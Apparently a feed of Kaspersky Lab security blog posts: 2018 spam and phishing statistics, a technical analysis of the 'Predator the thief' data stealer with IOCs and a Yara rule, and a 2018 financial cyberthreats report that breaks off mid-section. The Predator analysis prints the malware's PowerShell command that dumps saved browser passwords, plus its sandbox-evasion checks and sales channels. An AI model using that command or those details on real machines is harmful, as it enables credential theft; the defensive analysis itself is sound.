In 2018, China (11.69%) led the list of spamming countries, swapping places with the US and consigning the former leader to second place with 9.04%. Third position went to Germany (7.17%), which climbed into the Top 3 from sixth.

Vietnam, which ranked third last year, fell to fourth place (6.09%). It was followed by Brazil (4.87%), India (4.77%), and Russia (4.29%).

In 8th place, as in 2017, came France (3.34%), while Iran and Italy departed the Top 10. They were replaced by newcomers Spain, which rose from 16th to 9th place (2.20%, +0.72 p.p.), and Britain (2.18%, +0.59 p.p.).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Sources of spam by country, 2018 (download)

Spam email size

In 2018, the share of very small (up to 2 KB) messages increased significantly. Despite quarterly decline, the annual figure came in at 74.15%, up 30.75 p.p. against the previous reporting period. The proportion of 2–5 KB messages also increased (10.64%, +5.56 p.p.).

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Spam emails by size, 2018 (download)

The volume of larger spam dropped significantly against 2017. The share of messages sized 5–10 KB (7.37%) decreased by 1.77 p.p. and 10–20 KB (3.66%) by 12.6 p.p. The share of spam messages sized 20–50 KB (2.82%) saw the biggest drop, down 18.41 p.p.

Malicious attachments in email Malware families

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Top 10 malware families in 2018 (download)

In 2018, the most widely distributed malicious objects in email, assigned the Exploit.Win32.CVE-2017-11882 verdict, exploited a Microsoft Office vulnerability for executing arbitrary code without the user’s knowledge.

In second place was the Backdoor.Win32.Androm bot, whose functionality depends on additional modules downloaded at the command of the C&C servers. It was most often used to download malware.

The Trojan-PSW.Win32.Fareit family moved up from fifth to third place. Its main task is to steal data (cookies, passwords for various FTP, mail, and other services). The harvested information is sent to the cybercriminals’ server. Some members of the family are able to download and run other malware.

The Worm.Win32.WBVB family, which includes executable files written in Visual Basic 6 (in both P-code and Native mode) and are not trusted in KSN, remained in fourth place.

Fifth place went to the Backdoor.Java.Qrat family — cross-platform multi-functional backdoor written in Java and sold in the Darknet as a Malware-as-a-Service (MaaS) package. It is generally distributed by email in JAR attachments.

Trojan-Downloader.MSOffice.SLoad, a DOC/DOCX document containing a script that can be executed in MS Word, took sixth place. It is generally used to download and install ransomware on user computers.

The spyware Trojan-Spy.Win32.Noon ranked seventh.

The malware Trojan.PDF.Badur, which consists of a PDF document containing a link to a potentially dangerous website, dropped one place to eighth.

Ninth place was taken by the Trojan.BAT.Obfus family of malicious objects — obfuscated BAT files for running malware and changing OS security settings.

In tenth place, as in the previous year, was the family of Trojan downloaders Trojan.Win32.VBKrypt.

Countries targeted by malicious mailshots

As in previous years, first place in 2018 went to Germany. Its share accounted for 11.51% of all attacks. Second place was taken by Russia (7.21%), and Britain (5.76%) picked up bronze.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Countries targeted by malicious mailshots, 2018 (download)

The next three, separated by a whisker, were Italy (5.23%), Brazil (5.10%), and Vietnam (5.09%). Trailing Vietnam by 1.35 p.p. in seventh was the UAE (3.74%). India (3.15%), Spain (2.51%), and Taiwan (2.44%) rounded off the Top 10.

Statistics: phishing

In 2018, the Anti-Phishing system was triggered 482,465,211 times on Kaspersky Lab user computers as a result of phishing redirection attempts (236,233,566 more than in 2017). In total, 18.32% of our users were attacked.

Organizations under attack

The rating of organizations targeted by phishing attacks is based on the triggering of the heuristic component in the Anti-Phishing system on user computers. This component detects all instances when the user tries to follow a link in an email or on the Internet to a phishing page in the event that such links have yet to be added to Kaspersky Lab’s databases.

Rating of categories of organizations attacked by phishers

In 2018, the global Internet portals accounted for the lion’s share of heuristic component triggers. Its slice increased by 11.23 p.p. to 24.72% against the previous year. In second place came the banking sector (21.70%), down 5.3 p.p. Payment systems (14.02%) in 2018 ranked third.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Distribution of organizations subject to phishing attacks by category, 2018. (download)

Top 3 organizations under attack from phishers

This rating is made of organizations whose names were most frequently used by phishers (according to the heuristic statistics for triggers on user computers). It was the same lineup as in 2017, but rearranged slightly, with Microsoft in first place.

Microsoft 6.86% Facebook 6.37% PayPal 3.23% Attack geography Countries by share of attacked users

Brazil (28.28%) remains out in front by percentage of attacked unique users out of the total number of users in the country.

!function(e,t,s,i){var n="InfogramEmbeds",o=e.getElementsByTagName("script")[0],d=/^http:/.test(e.location)?"http:":"https:";if(/^\/{2}/.test(i)&&(i=d+i),window[n]&&window[n].initialized)window[n].process&&window[n].process();else if(!e.getElementById(s)){var r=e.createElement("script");r.async=1,r.id=s,r.src=i,o.parentNode.insertBefore(r,o)}}(document,0,"infogram-async","https://e.infogram.com/js/dist/embed-loader-min.js");

Percentage of users on whose computers the Anti-Phishing system was triggered out of all Kaspersky Lab users in the country, 2018 (download)

Top 10 countries by share of attacked users Country % Brazil 28.28 Portugal 22.63 Australia 20.72 Algeria 20.46 Réunion 20.39 Guatemala 20.34 Chile 20.09 Spain 20.05 Venezuela 19.89 Russia 19.76

Top 10 countries by share of attacked users

Despite a slight drop of 0.74 p.p., Brazil (28.28%) remains top by number of attacked users. Meanwhile, Portugal (22.63%) moved up to second place (+5.87 p.p.), displacing Australia (20.72%, –1.79 p.p.).

Conclusion

2018 showed that cybercriminals continue to keep a close eye on global events and use them to achieve their goals. We have seen a steady increase in phishing attacks on cryptocurrency-related resources, and expect new scams to appear in 2019. Despite the fall in value and the lean times for the cryptocurrency market as a whole, phishers and spammers will try to squeeze everything they can out of this topic.

The past year also demonstrated that spammers and scammers will continue to exploit annually occurring events — new smartphone launches, sales seasons, tax deadlines/rebates, and the like.

There is also a trend toward the transition to new channels of content distribution: Cybercriminals in 2018 used new methods of communication with their “audience,” including instant messengers and social networks, releasing wave after wave of self-propagating malicious messages. Hand in hand with this, as illustrated by the attack on universities, fraudsters are seeking not only new channels, but new targets as well.

2019. március 11.

A predatory tale: Who’s afraid of the thief?

In mid-February, Kaspersky Lab received a request for incident response from one of its clients. The individual who initially reported the issue to our client refused to disclose the origin of the indicator that they shared. What we do know is that it was a screenshot from one of the client’s internal computers taken on February 11 while an employee was apparently browsing through his emails. In addition, the anonymous source added that the screenshot was transferred to a C2 using a stealer dubbed ‘Predator’.

As soon as the client contacted us, we started conducting a full investigation into the infected machine, including memory dumps, event logs, environment indicators from the network and so on and so forth. Finding very little information about this tool, we decided that seeing as how we’d already dived into the stealer, we might as well share some of our main findings in case other incidents occur in the future. The purpose of this blogpost is to enumerate the Predator stealer’s versions, technical features, indicators and Yara rule signatures, to help monitor and detect new samples, and to provide general information about its owners’ activities.

As well as all the information we collected from the client, we went the extra mile and contacted a source who had previously analyzed Predator. This source was @Fumik0_, a French malware researcher who analyzed versions 2.3.5 and 2.3.7 in his blog just a few months ago (October 2018).

He joined Ido Naor, a principal security researcher at Kaspersky Lab and together they compiled a full analysis of the new versions of ‘Predator the thief’.

The blog was apparently so influential that the owners of the stealer decided to contact Fumik0 via Twitter. An account named Alexuiop1337 claiming to be the owner of Predator is also active and has been responding to Fumik0’s discoveries until fairly recently.

Predator the thief

Predator is a data stealer developed by Russian-speaking individuals. It’s being sold cheaply on Russian forums and has been detected many times in the wild. Although detection is successful with previous versions, its owners are rapidly adapting by generating FUD (Fully UnDetectable) samples every few days. The owners are not responsible for the victim attack vector and are only selling the builder. For a small additional payment they can also generate an administration panel for customers. The newest samples were exposed on their Telegram group; however, the links only redirect to a little-known AV aggregator which we don’t have access to. We’re currently tracking the samples’ hashes and waiting for triggers to show up.

latest version v3.0.7 Sample MD5 bf4cd781920f2bbe57e7e74a775b8e94 Code Language C++ File Types PE Supported Arch. x86 and x64 Unpacked Size <500Kb Admin Panel Example https://predatortop.xyz/login Admin Panel Software PHP, Apache, Ubuntu From v2 to v3

Predator, as a stealer, is considered simple and cheap. It’s good for attacking individuals and small businesses, but as far as large companies go, protection solutions and response teams can detect and remove its activity in a relatively short amount of time.

That said, the owners of Predator are very business oriented. They’re constantly updating their software, attempting to extend features and adjusting to client requirements and are generally not that aggressive when it comes to disclosure/analysis of their tool.

Obfuscation

Predator’s owners decided to obfuscate most of its code with a number of simple techniques. XOR, Base64, Substitutions, Stack strings and more are being used to hide API methods, Folder paths, Register keys, the C2 server/Admin panel and so on.

We sketched a flow chart for one of the obfuscation techniques. A large chunk of code boiled down to one Windows API call, which we see as a bit like overkill considering the fact that other techniques can be applied to strip the obfuscation.

We’ve written down a list for those who are after a step-by-step guide:

Step Description 0 Saving arguments somewhere 1 Get the function name 2 Get the library name 3 Recreating GetProcAddress 4 Calling function by a simple register call Export table

It was also found that the export table trick for getting the API function is far more complex than the one introduced in v2:

Anti-debugging/sandbox checks

Predator retains its old techniques for sandbox evasion, but keeps adding more and more features. One of them, for example, is a hardcoded list of DLLs that are checked if loaded into memory:

sbiedll dbghelp api_log pstorec dir_watch vmcheck wpespy SxIn Sf2

Loop for checking list of DLLs

One old trick, for example, that survived the version update is the check of Graphic Card Name introduced in v2.x.x.

Classy but mandatory – browser stealer support

Edge and Internet Explorer support was recently added to the list of browsers. The actions taken, however, are different from the malware decision-making with the Gecko and Chromium browsers. In previous versions, Predator usually uses a temporary file (*.col format file) to store browser content (in an SQLite3 database), but for Edge and IE it was replaced with a hardcoded PowerShell command that will directly put the content of the file into a dedicated repository..

powershell.exe -Command "[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime];$vault = New-Object Windows.Security.Credentials.PasswordVault; $b = 'Browser: Internet Explorer | Edge'; $a = ($vault.RetrieveAll() | % { $_.RetrievePassword(); $_ } | SELECT UserName, Password, Resource | Format-List Resource, UserName, Password) | Out-String; $c = $b + $a; $c = $c.Replace('Resource :', 'Url:').Replace('UserName :', 'Login:').Replace('Password :', 'Password:'); $c > "%PREDATOR_PATH%\General\IeEdgePasswords.txt"

As a reminder, Predator currently supports the following list of browser data theft, according to the info on the ‘official’ sales page:

The false keylogger feature

The owners of Predator list keylogger capabilities among its features, though a closer inspection of the code reveals that no keylogging is carried out. The behavior we captured is clearly that of a clipboard stealer. The functionality includes a crawler that checks if the clipboard contains data, grabs it and places it in a dedicated file the stealer owners have named ‘information.log’.

Thief logs

Diving into the file discussed in the clipboard stealer section above, we saw drastic changes from previous versions. The information logger is perhaps the most important collector of Predator. It stores all the tasks performed by the stealer on the victim machine.

We noticed that in previous minor versions, logs started collecting data that might be of interest to potential customers, such as:

  • HWID
  • System Language
  • Keyboard Layout

At the end of the report, the owners added a customer/payload ID – probably to improve support.

Updates

Predator is continually integrating new software into the stealing list and fixing bugs to maintain its stability and its popularity. Here’s a summary of the new features in v3:

Location Data stolen Games Osu
Battle.net FTP WinSCP VPN NordVPN 2FA Authy Messengers Pidgin
Skype Operating System Webcam
HWID
Clipboard
Specific document files (Grabber)
Project filenames* Browsers IE/Edge

*We noticed that the newest version of Predator has started collecting a list of .sln file names. These are project files usually generated by Visual Studio. We still have no idea if this is related to client demand for a future feature.

Sale point (Russian forums)

We found a very active seller of Predator on a forum called VLMI. It appears the main language on VLMI is Russian and the content mainly revolves around cyberattacks. In addition, the forum has a very strict set of rules that might get you banned if broken. The two sections (translated using Google) in the image below are examples of forbidden behavior.

It was also appears that each offer on the forum must go through a reviewer who decides if the piece of software or service is of financial benefit to the forum administrators, but at the same time fair towards other members.

For 8,000 rubles (~$120) worth of software, the forum will charge a 20% fee; if the value goes above 100,000 rubles (~$1,500), the commission decreases to 10%.

The Predator stealer’s main sales thread was found here:

https://vlmi.biz/threads/predator-the-thief-nativnyj-stiller-s-bolshim-funkcionalom-luchshaja-cena.21069/

Predator costs 2,000 rubles (~$30) for the stealer and admin panel. There is also an optional service to help the customer install the C&C. This is not as expensive as other stealers on the market, such as Vidar and HawkEye, but its developers are proactive in delivering updates and ensuring a fast and effective support service.

Telegram as a service

Predator’s main channel for updating their customers is Telegram. At the time of writing, the administrators were hosting over 370 members in this group:

https://t.me/PredatorSoftwareChannel

Another update channel is the seller @sett9.

It appears the Predator administrators are demonstrating FUD capabilities by running a sample generated by the builder of their stealer. However, some samples from their latest update (v3.0.7) have already been detected by Kaspersky products as: Trojan-PSW.Win32.Predator.qy (25F9EC882EAC441D4852F92E0EAB8595), while others are detected by heuristics.

https://scanmybin.net/result/af76a5666e5230cf087c270c51c2dfdc4324c365dc6f93c0f3ae7ce24f9db992

https://run4me.net/result/80163ed2bede58aff68a3bdf802917c61c78a05f37a3caf678ce5491f00d39b0

The executables above were not found in VirusTotal. According to the group, the links were posted around August of last year (2018). Numerous media uploads on the Telegram group revealed dozens of infected victims.

On the day we looked at the Telegram group (February 17, 2019), the latest build (v3.0.7) was released. According to the owners’ release notes, it was implemented with WinSCP and NordVPN support.

IOCs IP/Domains: Predator version IP/Domain v3.0.3 15charliescene15[.]myjino[.]ru v3.0.4 axixaxaxu1337[.]us v3.0.5 madoko[.]jhfree[.]net v3.0.6 kristihack46[.]myjino[.]ru v3.0.7 j946104[.]myjino[.]ru Hashes: Predator version MD5 Hash v3.0.3 c44920c419a21e07d753ed607fb6d7ca v3.0.4 cf2273b943edd0752a09e90f45958c85 v3.0.5 b2cbb3d80c8d830a3b3c2bd568ba1826 v3.0.6 dff67a78bb4866f9da5a0c1781ed5348 v3.0.7 25F9EC882EAC441D4852F92E0EAB8595 Yara: rule Predator_The_Thief : Predator_The_Thief { meta: description = "Yara rule for Predator The Thief 3.0.0+" author = "Fumik0_" date = "2018/10/12" update = "2019/02/26" strings: $mz = { 4D 5A } /* Predator V3.0.0+ */ $x1 = { C6 84 24 ?? ?? 00 00 8C } $x2 = { C6 84 24 ?? ?? 00 00 1A } $x3 = { C6 84 24 ?? ?? 00 00 D4 } $x4 = { C6 84 24 ?? ?? 00 00 03 } $x5 = { C6 84 24 ?? ?? 00 00 B4 } $x6 = { C6 84 24 ?? ?? 00 00 80 } /* Predator V3.0.3 -&gt; 3.0.6 */ $y1 = { B8 00 E1 F5 05 } $y2 = { 89 5C 24 0C } $y3 = { FF 44 24 ?? } $y4 = { 39 44 24 0C } $y5 = { BF 00 00 A0 00 } condition: $mz at 0 and ( ( all of ($x*)) or (all of ($y*)) ) }
2019. március 7.

Financial Cyberthreats in 2018

Introduction and Key Findings

The world of finance has been a great source of income cybercriminals across the world due to an obvious reason – money. While governments and organizations have been investing in new methods to protect financial services, malicious users have been investing in how to bypass them. This has fueled many changes in how online financial services and payment systems, large banks and POS terminals are being used.

The past year has seen a wide range of changes in the financial cyberthreats landscape, with new infiltration techniques, attack vectors and extended geography. But perhaps the most interesting thing to have happened is the changes in how people are victimized. With block chain and cryptocurrency now becoming popular, many new means of payment emerged on both on the white and black markets – attracting unwanted criminal attention.

Cryptocurrency became the hottest topic in 2018. Definitely being the story of the year, it stole the headlines from the threat of ransomware, turning the eyes of the cybersecurity community to a new danger. Wherever users were eager to pay for something with cryptocurrency – criminals were there. Threats were delivered in two ways – enriching malware with mining capacities to capitalize without noise and attacks on cryptocurrency infrastructure (wallets, exchanges, etc.). Even major APT actors like Roaming Mantis tried to capitalize, not to mention malicious software like PowerGhost; basically a cryptocurrency mining multi tool. As it was also pointed out, Lazarus, one of the most active financial predators in 2018, gradually expanded its list of targets. The latter now includes banks, fin-tech companies, PoS terminals, ATMs, as well as crypto-exchanges.

In the summer, we also covered an interesting case that proves the above – Lazarus was found to be hitting a cryptocurrency exchange with a fake installer and macOS malware. In this case, criminals created special software that looked legitimate and carried out legitimate functions. However, the program also uploaded a malicious update that turned out to be a backdoor. This is a new type of attack, which infects its targets via the supply chain; one of the key scenarios of the past year. This became one of the most creative attacks seen in 2018.

However, several months after that, the cybersecurity landscape brought an even bigger surprise to the community, yet again pointing out that even traditional, and experienced, financial enterprises could be endangered. In December, Kaspersky Lab revealed the DarkVishnya operation: a new series of unprecedented cyber-robberies targeting financial organizations in Eastern Europe. Incident responses, provided by our experts, discovered that in each case the corporate network was breached through an unknown device, controlled by the attackers, which had been smuggled into a company building and connected to the network. At least eight banks in the region have been attacked in this way, with estimated losses running into tens of millions of dollars. The conclusion here is simple – even when investing into cybersecurity, you may never know what how a cybercriminal will attack you. We all should be twice as vigilant.

This are a worrisome sign. While banks are experienced and have learnt how to improve their defenses, young fin-tech companies and crypto-exchanges could face a higher risk, due to the infancy of their security systems. Also, new unprecedented attack methods should be a warning for traditional financial organizations to be on guard.

Another cause for concern in that criminals decided to not only focus their efforts on financial services, but also on the financial departments of industrial companies, where payments of hundreds of thousands of dollars would not cause much suspicion. In the summer of 2018, Kaspersky Lab experts revealed a new wave of financial spear-phishing emails disguised as legitimate procurement and accounting letters that hit at least 400 industrial organizations in an attempt to earn money for cybercriminals.

We should also not forget about ATMs and treat its security seriously as within the last year, Kaspersky Lab specialists discovered six new families, meaning that there are now more than 20 of this kind. The greatest damage associated with attacks on ATMs was caused by infections from internal banking networks, such as FASTCash and ATMJackPot, which allowed attackers to reach thousands of ATMs. Apart from that, 2018 gave birth to a new toolkit for stealing money directly from such machines – we dubbed it KoffeyMaker.

Wrapping up on big businesses, the industry also witnessed good news – in 2018, police arrested a number of well-known cybercrime group members responsible for Carbanak/Cobalt and Fin7, among others. These groups have been involved in attacks on dozens, if not hundreds of companies and financial institutions around the world.

Going one level lower – from big organizations to small and medium enterprises – there were also a lot of attacks on organizations that use banking systems. Kaspersky Lab’s machine learning-based behavioral analysis system detected several waves of malicious activity related to the spread of the Buhtrap banking Trojan when attackers embedded their code in popular news sites and forums.

Moving down one more step – from SMEs to individual users – we can say that 2018 didn’t give the latter much respite from financial threats. Infamous mobile bankers are still there, hunting for money. Considering the above mentioned changes in the landscape, it is of no surprise that they expand the capacities, often combining various functions – like Rotexy that across the years have evolved to being banker and ransomware simultaneously. Some of them add mining capacities to ensure they make a profit. Other actors invested in new ways to compromise users – for instance, in 2018 Kaspersky Lab experts detected quite a rare Chrome extension designed to steal credentials.

The presented report continues the series of Kaspersky Lab reports (see here and here) that provide an overview of how the financial threat landscape has evolved over the years. It covers the common phishing threats that users encounter, along with Windows-based and Android-based financial malware.

The key findings of the report are:

Phishing:

  • In 2018, the share of financial phishing decreased from 53.8% to 44.7% of all phishing detections, still accounting for almost a half of overall detections.
  • Around one in five attempts to load a phishing page blocked by Kaspersky Lab products is related to banking phishing.
  • The share of phishing related attacks to payment systems and online shops accounted for almost 14% and 8.9% respectively in 2018. This is slightly less (single percentage points) than in 2017.
  • The share of financial phishing encountered by Mac users slightly grew, accounting for 57.6%.

Banking malware:

  • In 2018, the number of users attacked with banking Trojans was 889,452 – an increase of 15.9% in comparison with 767,072 2017.
  • 24.1% of users attacked with banking malware were corporate users.
  • Users in Russia, Germany, India, Vietnam, Italy, US and China were the most often attacked by banking malware.
  • Zbot and Gozi are still the kings when comes to most widespread banking malware family (over 26% and 20% of attacked users), followed by SpyEye (15.6%).

Android banking malware:

  • In 2018, the number of users that encountered Android banking malware more than tripled to 1,799,891 worldwide.
  • Just three banking malware families accounted for attacks on the vast majority of users (around 85%).
  • Russia, South Africa, and the United States were the countries with the highest percentage of users attacked by Android banking malware.
Financial Phishing

Financial phishing, one of the most typical ways for criminals to make money, doesn’t require a lot of investment to be potentially profitable. If successful, criminals receive credentials that can either be used to take the money or can be sold for a good price.

This combination of technical simplicity and effectiveness makes this type of malicious activity attractive to criminals. As Kaspersky Lab’s telemetry systems show, this type of activity accounts for around half of all phishing attacks over the past few years.

Fig. 1: The percentage of financial phishing attacks (from overall phishing attacks) detected by Kaspersky Lab in 2015-2018

In 2018, Kaspersky Lab’s anti-phishing technologies detected 482,465,211 attempts to visit different kinds of phishing pages. Of those, 44.7% of heuristic detections were attempts to visit a financial phishing page – almost 10% less than the share of phishing detections registered in 2017 (when it was 53.8%, the highest percentage of financial phishing ever registered by Kaspersky Lab).

This was mainly due to the increase in other phishing attacks categories. But first, let’s have a closer look on financial categories.

Kaspersky Lab categorization considers several types of phishing pages as “financial” – banks, well known payment brands such as PayPal, Visa, MasterCard, American Express and others, and internet shops and auction sites like Amazon, Apple store, Steam, E-bay and others. In 2018 all of them experienced slight relief: the share of phishing attacks against banks, payment systems and online shops decreased by 5.3, 1.8, and around 2 percentage points respectively.

Financial phishing attacks took 2nd, 3rd and 4th positions in the overall ranking:

Fig. 2: The distribution of different types of financial phishing detected by Kaspersky Lab in 2018

While in 2017 for the first time in our observations, payment systems and online shops hit the top three in all categories of phishing detections, 2018 became the year of going back to normal with global online portals being in first position. However, the presented chart shows that almost every second phishing attack was financially-related.

We believe that this change happened due high media attention to targets like Facebook amid various scandals across the year. If we have a look on the global internet portal category, it fell from second place in 2016 with 24.1% to fourth place in 2017 with 10.9%. In 2018 it restored its position, accounting for over 24%.

Fig. 3: The percentage of global internet portal phishing detected by Kaspersky Lab in 2016-2018

At the same time, the victimology has not experienced any change – top transnational banks, popular payment systems and internet shops and auction sites are still the most appealing targets for cybercriminals.

Financial phishing on Mac

MacOS has been continuously considered relatively safe platform when it comes to cybersecurity due to small number of malware families that targets it. However, phishing is OS-agnostic criminal activity – it is all about social engineering. Moreover, according to Kaspersky Lab’s statistics, MacOS users often face phishing threats – if not with the same frequency as other users.

In 2016, 31.4% of phishing attacks against Mac-users were aimed at stealing financial data. This is almost half that seen in 2017, when 55.6% of financial attacks blocked by Kaspersky Lab were financially-themed. The past year also indicated slightly growth with overall share at the level of 57.6%, meaning that the threat is not fading.

Overall, in 2017 the split looked like this:

Fig. 4: The distribution of different types of financial phishing detected by Kaspersky Lab on Mac in 2017

One year later, the ‘Other’ category slightly fell, leading to the overall growth of financially related attacks.

Fig. 5: The distribution of different types of financial phishing detected by Kaspersky Lab on Mac in 2018

All in all, our data shows that the financial share of phishing attacks on Macs is also quite solid – as seen for Windows. Let’s have a closer look at both categories.

Mac vs Windows

In 2017, we found out an interesting twist when Apple became the most frequently used brands in the online shop category both in MacOS and Windows statistics, pushing Amazon down to the second place in the latter platform. Even more interesting is that in 2018 Apple has kept its position in Windows statistics, but Amazon went back to leading MacOS statistics for the first time since we started tracking this activity.

Mac Windows Amazon.com: Online Shopping Apple Apple eBay Alibaba Group Amazon.com: Online Shopping eBay MercadoLibre Americanas Steam groupon Alibaba Group Bell Canada Americanas Shopify Netflix Inc Hostway Wal-Mart Stores, Inc.

Fig. 6: The most frequently used brands in ‘online shop’ financial phishing schemes

When it comes to attacks users of payment systems, the situation is as follows:

Mac Windows PayPal Visa Inc. Visa Inc. PayPal MasterCard International American Express American Express MasterCard International Skrill Ltd. Cielo S.A. adyen payment system qiwi.ru Authorize.Net alipay qiwi.ru Skrill Ltd. Perfect Money Ripple

Fig.7: The most frequently used brands in ‘payment systems’ financial phishing schemes

Overall, the situation is more or less the same apart from the fact that Paypal overrun Mastercard and took the first ranking in MacOS statistics.

The tables above can serve as advisory lists for the users of the corresponding systems: they illustrate that criminals will use these well-known names in an attempt to illegally obtain user payment cards, online banking and payment system credentials.

Phishing campaign themes

Apart from the traditional campaigns that will be covered below, there was one distinctive feature in phishing disguises in comparison with 2016 and 2017 – entertainment. While it is not fully financially related, criminals still could steal users’ credentials or account for sale or personal use. The list of topics is no longer limited to fairly old copies of online banking, payment systems or internet shop web pages.

Here is a closer look on how the most targeted sectors were movies streaming services.

Fig. 8: A phishing page under the guise of streaming service

Digital gaming platforms.

Fig. 9: A phishing page under the guise of gaming platform

Typical commercial and payment brands were also targeted –usually urging a victim to enter credentials as soon as possible.

Fig. 10: A phishing message on behalf of payment brand

Fig. 11: A phishing message on behalf of payment brand

Of course, by clicking the link or entering the credentials, a user would not get access to their account – they would just pass their important personal information on to fraudsters.

This is one of the most common tricks to intimidate a victim – the threat of blocking or breaking in to an account (“your account has been suspended”).

Don’t show your credit card data to strangers

Due to the human nature and social engineering, phishing has been in the cybercriminals’ arsenal for years, being a major tool not only for monetization, but also for major APT actors as a method to initially compromise a targeted system.

That said, always stay vigilant. Double check the legitimacy of the website while paying online. Double check the legitimacy of emails, especially if they urge you to do something – like change your password.

If you can’t be sure of the above – don’t click the link.

And don’t forget to use a proven security solution with behavior-based anti-phishing technologies. This will make it possible to identify even the most recent phishing scams that haven’t yet been added to anti-phishing databases.

Banking malware

When discussing financial malware in this paper – for clarity – we mean the typical banking Trojans, designed to steal the credentials used to access online banking or payment system accounts and to intercept one-time passwords.

Across 2016, there was a steady growth in the number of users attacked with any kind of financial malware – after falls in 2014 and 2015. 2017 and first half of 2018 has seen falls once again. In 2017, the decrease returned with the number of attacked users falling to 767,072 from 1,088,933 users worldwide in 2016 – almost a 30% decline.

However, a sharp increase in May to November 2018 has changed the landscape, rebalancing the decline and overall growing to 889,452 by 15.95% in comparison with the previous year. This is the first incident of year-to-year growth since 2016. This happened due to explosive growth in RTM banker activities that would be explored bellow.

Fig. 12: The dynamic change in the number of users attacked with banking malware 2016-2018

The geography of attacked users

As shown in the charts below, more than half of all users attacked with banking malware in 2017 and 2018 were located in only ten countries. In 2017, the leader was Germany, followed by Russia and China.

Fig. 13: The geographic distribution of users attacked with banking malware in 2017

Here is what happened in 2018:

Fig. 14: The geographic distribution of users attacked with banking malware in 2018

For the last year, Russia has outrun Germany. India did the same to China, closing the top three ranking. The latter at the same time dropped to the seventh position. Overall, picture looks more or less stable with the leader occupied about one out of five users, while the ‘Others’ category accounts for around 40% of the share.

The type of users attacked

2017 has shown a slight growth of this sector, confirming our hypothesis that criminals are shifting to targeted attacks on business – despite the overall fall of banking malware detection, the corporate users’ share is still showing a steady rise.

Fig. 15: The distribution of attacked users by type in 2017

This is alarming, as we see that for the last three years in a row, almost every fifth banking malware attack was focused on the corporate sector. And the share is growing. The reason behind this is clear – while attacks on consumers will only give a criminal access to banking or payment system accounts, successful hits on employees will also compromise a company’s financial resources.

2018 has once again proven this:

Fig. 16: The distribution of attacked users by type in 2018

The share of corporate users has grown by over 4 percentage points.

The main actors and developments

The banking malware landscape has been continuously occupied by several major players. In 2017, Zbot was the leader, actively challenged by Gozi.

Fig. 17: The distribution of the most widespread banking malware families in 2017

The latter increased its share by more than 10 percentage points, while Zbot decreased its own from more than 44% to 32.9%.

One more particularly interesting thing about 2017 was that the share of the ‘others’ category, which more than doubled, indicating that the financial threat landscape is becoming more and more diverse. That said, while the proportion of leaders was reducing, smaller players were becoming more active.

Fig. 18: The distribution of the most widespread banking malware families in 2018

2018 saw a trend in the major players decreasing their attacks – Zbot fell to 26.4% and Gozi to a little bit over 20%. At the same time, ‘other’ category also reduced. The landscape is obviously stabilizing with “middle-class” families strengthening their positions.

This is very inconvenient for the security research community as it is much easier to track several big players than many attackers that are small and flexible in their tactics.

Of particular interest was the RTM banking Trojan, whose explosive growth pumped up the figures for 2018. Kaspersky Lab has warned about this family when there was a surge in its activity with the overall number of users attacked in 2018 exceeding 130,000 – an increase from as few as 2,376 attacked users in 2017.

The pace of attacks appears to be continuing into 2019, with more than 30,000 users attacked during the first month and a half of the year, making RTM one of the most active banking Trojans on the threat landscape.

What’s interesting, the Trojan targets not financial organizations per se but rather people responsible for financial accounting in small and medium-sized businesses, with a particular focus on the IT and legal sectors. This makes RTM attacks part of a general trend where cybercriminals are spreading their activities from financial organizations, pulling their attention towards the private sector where entities in general invest less in security solutions. So far, the Trojan has hit mostly companies based in Russia. But there were multiple cases in the industry when successful cyber threats were first used in Russia and later went international. RTM banking Trojan can easily become yet another example of the same development cycle.

Kaspersky Lab estimates that during the course of two years, the attackers may have conducted multiple illegal transactions, up to a million rubles (the equivalent of $15,104) each.

That is why we urge organizations that can become potential targets of this malware to take preventative measures and make sure their security products detect and block this threat.

We also recommend that users be cautious when conducting financial operations online from PCs in general. Don’t underestimate the professionalism of modern cybercriminals by leaving your computer unprotected.

Mobile Banking Malware

We have reviewed the methodology behind the mobile section of this year’s report. Traditionally, we have analyzed Android banking malware statistics through KSN data gathered from Kaspersky Internet Security solution. But since Kaspersky Lab develops new mobile security solutions and features, statistics gathered from one product alone becomes less relevant. That is why this year we decided to shift to expanded data, gathered from multiple mobile solutions.

And here is the result:

Fig. 19: The change in the number of users attacked with Android banking malware 2016-2018

Over the last few years, Android banking malware evolved – with several peaks in 2016. The overall number of attacked users was 786,325.

